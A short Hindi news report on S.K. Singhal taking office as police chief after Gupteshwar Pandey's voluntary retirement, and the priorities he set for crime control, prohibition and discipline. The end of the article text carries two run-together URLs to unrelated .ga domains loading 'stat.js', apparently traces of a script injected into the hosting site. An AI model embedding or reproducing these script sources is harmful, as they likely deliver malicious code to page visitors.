मंगलवार को डीजीपी गुप्तेश्वर पांडे ने डीजीपी पद से अचित सेनानिवृत्ति ले ली जिसके बाद भारतीय पुलिस सेवा के 1988 बैच के अधिकारी पद संभालते ही फॉर्म में आ गए हैं।
खबरों के मुताबिक डीजीपी सिंघल ने कामकाज शुरू करते ही सीनियर पुलिस अधिकारियों के साथ बैठक करी है और पुलिस की प्राथमिकताओं को तय किया है।

 

डीजीपी एसके सिंघल ने आदेश जारी किया है कि अ’पराध नियंत्रण, श’राबबं’दी और विधि व्यवस्था पर पुलिस पूरी ताकत से काम करेगी। सिंघल ने स’ख्त चे’तावनी दी है कि किसी भी सूरत में इन मामलों पर लापरवाही ब’र्दाश्त नहीं की जाएगी।

 

डीजीपी एसके सिंघल ने पुलिस की प्राथमिकताओं में विभागीय कार्यवाही के मामलों को भी रखा है, उन्योते बताया है कि इसके तहत गंभीर आ’रोपों में विभागीय कार्यवाही होने पर सजा भी कठिन होनी चाहिए। ऐसा नहीं चलेगा कि आरोप गंभीर हैं और हल्की सजा देकर विभागीय कार्यवाही का निपटारा कर दिया जाए। इसपर भी पुलिस मुख्यालय की पैनी नजर होगी।

 

एसके सिंघल, डीजीपी ने कहा है, “हमने पुलिस की प्राथमिकताएं तय कर दी हैं। राजपत्रित पुलिस अधिकारियों की भी जिम्मेदारी तय होगी। मानव संसाधन का बेहतर इस्तेमाल किया जाएगा और लोगों की पुलिस से अपेक्षाओं को हर हाल में पूरा किया जाएगा|”https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.